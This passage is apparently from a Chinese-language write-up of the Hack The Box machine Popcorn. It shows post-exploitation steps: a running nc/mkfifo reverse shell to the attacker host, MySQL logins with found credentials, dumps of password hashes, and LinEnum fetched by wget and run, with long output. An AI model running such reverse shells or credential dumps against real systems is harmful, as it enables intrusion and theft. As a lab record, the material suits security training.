root        74  0.0  0.0      0     0 ?        S<   14:48   0:00 [ksnapd]
root        76  0.0  0.0      0     0 ?        S<   14:48   0:00 [kondemand/0]
root        78  0.0  0.0      0     0 ?        S<   14:48   0:00 [kconservative/0]
root        80  0.0  0.0      0     0 ?        S<   14:48   0:00 [krfcommd]
root       202  0.0  0.0      0     0 ?        S<   14:48   0:00 [mpt_poll_0]
root       293  0.0  0.0      0     0 ?        S<   14:48   0:00 [mpt/0]
root       417  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_32]
root       432  0.0  0.0      0     0 ?        S<   14:48   0:00 [kdmflush]
root       434  0.0  0.0      0     0 ?        S<   14:48   0:00 [kdmflush]
root       524  0.0  0.0      0     0 ?        S<   14:48   0:00 [kjournald2]
root       574  0.0  0.0   2284   836 ?        S    14:48   0:00 upstart-udev-bridge --daemon
root       577  0.0  0.1   2768  1224 ?        S<s  14:48   0:00 udevd --daemon
root       777  0.0  0.1   2764  1184 ?        S<   14:48   0:00 udevd --daemon
root       778  0.0  0.1   2764  1184 ?        S<   14:48   0:00 udevd --daemon
root       820  0.0  0.0      0     0 ?        S<   14:48   0:00 [kpsmoused]
root       878  0.0  0.0   1852   544 ?        Ss   14:48   0:00 dd bs=1 if=/proc/kmsg of=/var/run/rsyslog/kmsg
syslog     921  0.0  0.1  33528  1536 ?        Sl   14:48   0:00 rsyslogd -c4
root      1075  0.0  0.0   1704   544 tty4     Ss+  14:48   0:00 /sbin/getty -8 38400 tty4
root      1082  0.0  0.0   1704   544 tty5     Ss+  14:48   0:00 /sbin/getty -8 38400 tty5
root      1085  0.0  0.0   1704   544 tty2     Ss+  14:48   0:00 /sbin/getty -8 38400 tty2
root      1086  0.0  0.0   1704   540 tty3     Ss+  14:48   0:00 /sbin/getty -8 38400 tty3
root      1088  0.0  0.0   1704   548 tty6     Ss+  14:48   0:00 /sbin/getty -8 38400 tty6
root      1096  0.0  0.0   2092   872 ?        Ss   14:48   0:00 cron
daemon    1097  0.0  0.0   1964   420 ?        Ss   14:48   0:00 atd
root      1239  0.0  0.0   1752   536 ?        S    14:48   0:00 /bin/sh /usr/bin/mysqld_safe
root      1279  0.0  0.0      0     0 ?        S<   14:48   0:00 [vmmemctl]
mysql     1485  0.0  1.8 147048 18612 ?        Sl   14:48   0:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root      1487  0.0  0.0   1668   548 ?        S    14:48   0:00 logger -t mysqld -p daemon.error
root      1637  0.0  0.6  33324  6980 ?        Ss   14:48   0:00 /usr/sbin/apache2 -k start
root      1657  0.0  0.0   1704   548 tty1     Ss+  14:48   0:00 /sbin/getty -8 38400 tty1
root      1659  0.0  0.3  17008  3812 ?        Sl   14:48   0:03 /usr/sbin/vmtoolsd
root      1697  0.0  0.7  13752  7680 ?        S    14:48   0:00 /usr/lib/vmware-vgauth/VGAuthService -s
root      1717  0.0  0.0   2144   304 ?        Ss   14:48   0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp3/dhclient.eth0.leases eth0
root      1767  0.0  0.1   5436  1076 ?        Ss   14:48   0:00 /usr/sbin/sshd
www-data  1840  0.0  0.7  34180  7348 ?        S    15:09   0:00 /usr/sbin/apache2 -k start
www-data  1843  0.0  0.7  34228  8040 ?        S    15:09   0:00 /usr/sbin/apache2 -k start
www-data  1844  0.0  0.7  34244  7536 ?        S    15:09   0:00 /usr/sbin/apache2 -k start
www-data  1854  0.0  0.7  34208  7504 ?        S    15:17   0:00 /usr/sbin/apache2 -k start
www-data  1859  0.0  0.7  34308  7572 ?        S    15:18   0:00 /usr/sbin/apache2 -k start
www-data  1868  0.0  0.6  34040  6752 ?        S    15:26   0:00 /usr/sbin/apache2 -k start
www-data  1869  0.0  0.4  33908  4708 ?        S    15:26   0:00 /usr/sbin/apache2 -k start
www-data  1870  0.0  0.6  34068  6936 ?        S    15:26   0:00 /usr/sbin/apache2 -k start
www-data  1871  0.0  0.6  33908  6728 ?        S    15:26   0:00 /usr/sbin/apache2 -k start
www-data  1889  0.0  0.6  33672  6284 ?        S    15:46   0:00 /usr/sbin/apache2 -k start
www-data  1890  0.0  0.0   1752   488 ?        S    15:57   0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.4 443 >/tmp/f
www-data  1893  0.0  0.0   1704   412 ?        S    15:57   0:00 cat /tmp/f
www-data  1894  0.0  0.0   1752   504 ?        R    15:57   0:00 sh -i
www-data  1895  0.0  0.0   1724   608 ?        R    15:57   0:00 nc 10.10.14.4 443
www-data  1905  0.0  0.0   2364   928 ?        R    16:02   0:00 ps -aux
$

21、这里使用上面翻阅到的数据库账号密码情况,去登录下数据库看一下信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
$ 
$ mysql -u 'torrent' --password='SuperSecret!!' -e 'show databases'
Database
information_schema
torrenthoster
$ mysql -u 'torrent' --password='SuperSecret!!' -D torrenthoster -e 'show tables
> '
Tables_in_torrenthoster
ban
categories
comments
log
namemap
news
subcategories
users
$ mysql -u 'torrent' --password='SuperSecret!!' -D torrenthoster -e 'users'
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'users' at line 1
$ mysql -u 'torrent' --password='SuperSecret!!' -D torrenthoster -e 'describe users'
Field   Type    Null    Key     Default Extra
id      int(10) unsigned        NO      PRI     NULL    auto_increment
userName        varchar(40)     NO      UNI
password        varchar(40)     NO
privilege       varchar(10)     NO
email   varchar(30)     NO
joined  datetime        NO              0000-00-00 00:00:00
lastconnect     datetime        NO              0000-00-00 00:00:00
$ mysql -u 'torrent' --password='SuperSecret!!' -D torrenthoster 'select userName,password from users'
ERROR 1044 (42000): Access denied for user 'torrent'@'localhost' to database 'select userName,password from users'
$ mysql -u 'torrent' --password='SuperSecret!!' -D torrenthoster -e 'select userName,password from users'
userName        password
Admin   d5bfedcee289e5e05b86daad8ee3e2e2
test    098f6bcd4621d373cade4e832627b4f6
$

22、但是 admin 密码无法破解,我又使用数据的密码,去ssh 登录 george ,发现也是无法登录,初始命令行里,使用su也无法切换,说明这个密码是不对的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~/桌面]
└─$ ssh george@10.10.10.6
Unable to negotiate with 10.10.10.6 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

┌──(kali㉿kali)-[~/桌面]
└─$ ssh -oHostKeyAlgorithms=+ssh-dss george@10.10.10.6
The authenticity of host '10.10.10.6 (10.10.10.6)' can't be established.
DSA key fingerprint is SHA256:aioUHN0baIWMqg/K4OfQoSDFWO0jbTlod7tSnXT8YrM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.6' (DSA) to the list of known hosts.
george@10.10.10.6's password: 
Permission denied, please try again.
george@10.10.10.6's password: 
Permission denied, please try again.
george@10.10.10.6's password: 
george@10.10.10.6: Permission denied (publickey,password).

$ su george
su: must be run from a terminal
$ su - george
su: must be run from a terminal
$

23、然后我又去 george 的根目录里一顿翻阅,结果还是什么都没发现(记重点,这里粗心了,没有一一翻阅文件,只是大体上看了一遍)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
$ pwd
/home/george
$ ls -la
total 860
drwxr-xr-x 3 george george   4096 Oct 26 14:57 .
drwxr-xr-x 3 root   root     4096 Mar 17  2017 ..
lrwxrwxrwx 1 george george      9 Oct 26  2020 .bash_history -> /dev/null
-rw-r--r-- 1 george george    220 Mar 17  2017 .bash_logout
-rw-r--r-- 1 george george   3180 Mar 17  2017 .bashrc
drwxr-xr-x 2 george george   4096 Mar 17  2017 .cache
-rw-r--r-- 1 george george    675 Mar 17  2017 .profile
-rw-r--r-- 1 george george      0 Mar 17  2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17  2017 torrenthoster.zip
-rw-r--r-- 1 george george     33 Jan  2 14:48 user.txt
$ cat .sudo_as_admin_successful
$ .profile
sh: .profile: not found
$ cat .profile
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022

# if running bash
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
        . "$HOME/.bashrc"
    fi
fi

# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
    PATH="$HOME/bin:$PATH"
fi
$ 
$

24、然后我就开始上枚举神器了,进行枚举 LinEnum.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
┌──(kali㉿kali)-[~/桌面/htb-tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.6 - - [02/Jan/2024 22:28:12] "GET /LinEnum.sh HTTP/1.0" 200 -

$ cd /tmp
$ 
$ ls -la
total 24
drwxrwxrwt  5 root     root     4096 Jan  2 16:06 .
drwxr-xr-x 21 root     root     4096 Jan  2 14:48 ..
drwxrwxrwt  2 root     root     4096 Jan  2 14:48 .ICE-unix
drwxrwxrwt  2 root     root     4096 Jan  2 14:48 .X11-unix
prw-r--r--  1 www-data www-data    0 Jan  2 16:30 f
-rw-r--r--  1 root     root     1600 Jan  2 14:48 vgauthsvclog.txt.0
drwx------  2 root     root     4096 Jan  2 14:48 vmware-root
$ wget http://10.10.14.4/LinEnum.sh
--2024-01-02 16:30:22--  http://10.10.14.4/LinEnum.sh
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: `LinEnum.sh'

     0K .......... .......... .......... .......... .....     100% 24.9K=1.8s

2024-01-02 16:30:25 (24.9 KB/s) - `LinEnum.sh' saved [46631/46631]

$ ls
LinEnum.sh
f
vgauthsvclog.txt.0
vmware-root
$ 


$ chmod +x ./LinEnum.sh
$ ./LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Tue Jan  2 16:31:18 EET 2024                                                             
                                                                                         

### SYSTEM ##############################################
[-] Kernel information:
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux


[-] Kernel information (continued):
Linux version 2.6.31-14-generic-pae (buildd@rothera) (gcc version 4.4.1 (Ubuntu 4.4.1-4ubuntu8) ) #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009


[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=9.10
DISTRIB_CODENAME=karmic
DISTRIB_DESCRIPTION="Ubuntu 9.10"


[-] Hostname:
popcorn


### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)


[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             pts/0    10.10.14.23      Tue Nov 21 19:24:41 +0200 2023
george           tty1                      Fri May  5 23:12:20 +0300 2017


[-] Who else is logged on:
 16:31:18 up  1:43,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT


[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(syslog) gid=103(syslog) groups=103(syslog)
uid=102(landscape) gid=105(landscape) groups=105(landscape)
uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(george) gid=1000(george) groups=1000(george),4(adm),20(dialout),24(cdrom),46(plugdev),109(lpadmin),110(sambashare),111(admin)
uid=104(mysql) gid=113(mysql) groups=113(mysql)


[-] It looks like we have some admin users:
uid=1000(george) gid=1000(george) groups=1000(george),4(adm),20(dialout),24(cdrom),46(plugdev),109(lpadmin),110(sambashare),111(admin)


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
landscape:x:102:105::/var/lib/landscape:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
george:x:1000:1000:George Papagiannopoulos,,,:/home/george:/bin/bash
mysql:x:104:113:MySQL Server,,,:/var/lib/mysql:/bin/false


[-] Super user account(s):
root


[+] We can sudo without supplying a password!
usage: sudo [-n] -h | -K | -k | -L | -V | -v
usage: sudo -l[l] [-AnS] [-g groupname|#gid] [-U username] [-u username|#uid]
            [-g groupname|#gid] [command]
usage: sudo [-AbEHnPS] [-C fd] [-g groupname|#gid] [-p prompt] [-u
            username|#uid] [-g groupname|#gid] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AnS] [-C fd] [-g groupname|#gid] [-p prompt] [-u
            username|#uid] file ...


[+] Possible sudo pwnage!
file


[-] Accounts that have recently used sudo:
/home/george/.sudo_as_admin_successful


[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x  3 root   root   4.0K Mar 17  2017 .
drwxr-xr-x 21 root   root   4.0K Jan  2 14:48 ..
drwxr-xr-x  3 george george 4.0K Oct 26 14:57 george


[-] Root is allowed to login via SSH:
PermitRootLogin yes


### ENVIRONMENTAL #######################################
[-] Environment information:
APACHE_PID_FILE=/var/run/apache2.pid
APACHE_RUN_USER=www-data
PATH=/usr/local/bin:/usr/bin:/bin
PWD=/tmp
APACHE_RUN_GROUP=www-data
LANG=C
SHLVL=1
_=/usr/bin/env


[-] Path information:
/usr/local/bin:/usr/bin:/bin
drwxr-xr-x 2 root root  4096 Mar 17  2017 /bin
drwxr-xr-x 2 root root 20480 Oct 26  2020 /usr/bin
drwxr-xr-x 2 root root  4096 Mar 17  2017 /usr/local/bin


[-] Available shells:
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen


[-] Current umask value:
u=rwx,g=rx,o=rx
0022


[-] Password and storage information:
PASS_MAX_DAYS   99999
PASS_MIN_DAYS   0
PASS_WARN_AGE   7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root  724 Sep 15  2009 /etc/crontab

/etc/cron.d:
total 16
drwxr-xr-x  2 root root 4096 Mar 17  2017 .
drwxr-xr-x 87 root root 4096 Jan  2 14:48 ..
-rw-r--r--  1 root root  102 Sep 15  2009 .placeholder
-rw-r--r--  1 root root  506 May  3  2011 php5

/etc/cron.daily:
total 68
drwxr-xr-x  2 root root  4096 Mar 17  2017 .
drwxr-xr-x 87 root root  4096 Jan  2 14:48 ..
-rw-r--r--  1 root root   102 Sep 15  2009 .placeholder
-rwxr-xr-x  1 root root   633 Nov 18  2010 apache2
-rwxr-xr-x  1 root root   189 Oct 23  2009 apport
-rwxr-xr-x  1 root root 16338 Oct 15  2009 apt
-rwxr-xr-x  1 root root   314 Sep 28  2009 aptitude
-rwxr-xr-x  1 root root   502 May  9  2009 bsdmainutils
-rwxr-xr-x  1 root root   256 Sep 20  2009 dpkg
-rwxr-xr-x  1 root root    89 Aug 20  2009 logrotate
-rwxr-xr-x  1 root root  1270 Sep  7  2009 man-db
-rwxr-xr-x  1 root root   665 Apr 29  2009 mlocate
-rwxr-xr-x  1 root root  2149 Jun 16  2009 popularity-contest
-rwxr-xr-x  1 root root  3349 Sep 15  2009 standard

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Mar 17  2017 .
drwxr-xr-x 87 root root 4096 Jan  2 14:48 ..
-rw-r--r--  1 root root  102 Sep 15  2009 .placeholder

/etc/cron.monthly:
total 16
drwxr-xr-x  2 root root 4096 Mar 17  2017 .
drwxr-xr-x 87 root root 4096 Jan  2 14:48 ..
-rw-r--r--  1 root root  102 Sep 15  2009 .placeholder
-rwxr-xr-x  1 root root  129 Sep 15  2009 standard

/etc/cron.weekly:
total 20
drwxr-xr-x  2 root root 4096 Oct  1  2020 .
drwxr-xr-x 87 root root 4096 Jan  2 14:48 ..
-rw-r--r--  1 root root  102 Sep 15  2009 .placeholder
-rwxr-xr-x  1 root root 1413 Nov 11  2008 cvs
-rwxr-xr-x  1 root root  830 Sep  7  2009 man-db


[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


### NETWORKING  ##########################################
[-] Network and IP info:
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:6b:a2  
          inet addr:10.10.10.6  Bcast:10.10.11.255  Mask:255.255.254.0
          inet6 addr: dead:beef::250:56ff:feb9:6ba2/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:6ba2/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1107625 errors:0 dropped:0 overruns:0 frame:0
          TX packets:385064 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:78705835 (78.7 MB)  TX bytes:30482777 (30.4 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:296 errors:0 dropped:0 overruns:0 frame:0
          TX packets:296 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:44770 (44.7 KB)  TX bytes:44770 (44.7 KB)


[-] ARP history:
fe80::250:56ff:feb9:d291 dev eth0 lladdr 00:50:56:b9:d2:91 router STALE
10.10.10.2 dev eth0 lladdr 00:50:56:b9:d2:91 REACHABLE


[-] Nameserver(s):
nameserver 8.8.8.8
nameserver 10.10.10.2


[-] Default route:
default via 10.10.10.2 dev eth0  metric 100 


[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               


[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               


### SERVICES #############################################
[-] Running processes:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   2528  1416 ?        Ss   14:48   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   14:48   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   14:48   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   14:48   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   14:48   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   14:48   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   14:48   0:00 [cpuset]
root         8  0.0  0.0      0     0 ?        S<   14:48   0:00 [khelper]
root         9  0.0  0.0      0     0 ?        S<   14:48   0:00 [netns]
root        10  0.0  0.0      0     0 ?        S<   14:48   0:00 [async/mgr]
root        11  0.0  0.0      0     0 ?        S<   14:48   0:00 [kintegrityd/0]
root        12  0.0  0.0      0     0 ?        S<   14:48   0:00 [kblockd/0]
root        13  0.0  0.0      0     0 ?        S<   14:48   0:00 [kacpid]
root        14  0.0  0.0      0     0 ?        S<   14:48   0:00 [kacpi_notify]
root        15  0.0  0.0      0     0 ?        S<   14:48   0:00 [kacpi_hotplug]
root        16  0.0  0.0      0     0 ?        S<   14:48   0:00 [ata/0]
root        17  0.0  0.0      0     0 ?        S<   14:48   0:00 [ata_aux]
root        18  0.0  0.0      0     0 ?        S<   14:48   0:00 [ksuspend_usbd]
root        19  0.0  0.0      0     0 ?        S<   14:48   0:00 [khubd]
root        20  0.0  0.0      0     0 ?        S<   14:48   0:00 [kseriod]
root        21  0.0  0.0      0     0 ?        S<   14:48   0:00 [kmmcd]
root        22  0.0  0.0      0     0 ?        S<   14:48   0:00 [bluetooth]
root        23  0.0  0.0      0     0 ?        S    14:48   0:00 [khungtaskd]
root        24  0.0  0.0      0     0 ?        S    14:48   0:00 [pdflush]
root        25  0.0  0.0      0     0 ?        S    14:48   0:00 [pdflush]
root        26  0.0  0.0      0     0 ?        S<   14:48   0:00 [kswapd0]
root        27  0.0  0.0      0     0 ?        S<   14:48   0:00 [aio/0]
root        28  0.0  0.0      0     0 ?        S<   14:48   0:00 [ecryptfs-kthrea]
root        29  0.0  0.0      0     0 ?        S<   14:48   0:00 [crypto/0]
root        32  0.0  0.0      0     0 ?        S<   14:48   0:00 [pciehpd]
root        34  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_0]
root        35  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_1]
root        36  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_2]
root        37  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_3]
root        38  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_4]
root        39  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_5]
root        40  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_6]
root        41  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_7]
root        42  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_8]
root        43  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_9]
root        44  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_10]
root        45  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_11]
root        46  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_12]
root        47  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_13]
root        48  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_14]
root        49  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_15]
root        50  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_16]
root        51  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_17]
root        52  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_18]
root        53  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_19]
root        54  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_20]
root        55  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_21]
root        56  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_22]
root        57  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_23]
root        58  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_24]
root        59  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_25]
root        60  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_26]
root        61  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_27]
root        62  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_28]
root        63  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_29]
root        64  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_30]
root        66  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_31]
root        68  0.0  0.0      0     0 ?        S<   14:48   0:00 [kstriped]
root        70  0.0  0.0      0     0 ?        S<   14:48   0:00 [kmpathd/0]
root        72  0.0  0.0      0     0 ?        S<   14:48   0:00 [kmpath_handlerd]
root        74  0.0  0.0      0     0 ?        S<   14:48   0:00 [ksnapd]
root        76  0.0  0.0      0     0 ?        S<   14:48   0:00 [kondemand/0]
root        78  0.0  0.0      0     0 ?        S<   14:48   0:00 [kconservative/0]
root        80  0.0  0.0      0     0 ?        S<   14:48   0:00 [krfcommd]
root       202  0.0  0.0      0     0 ?        S<   14:48   0:00 [mpt_poll_0]
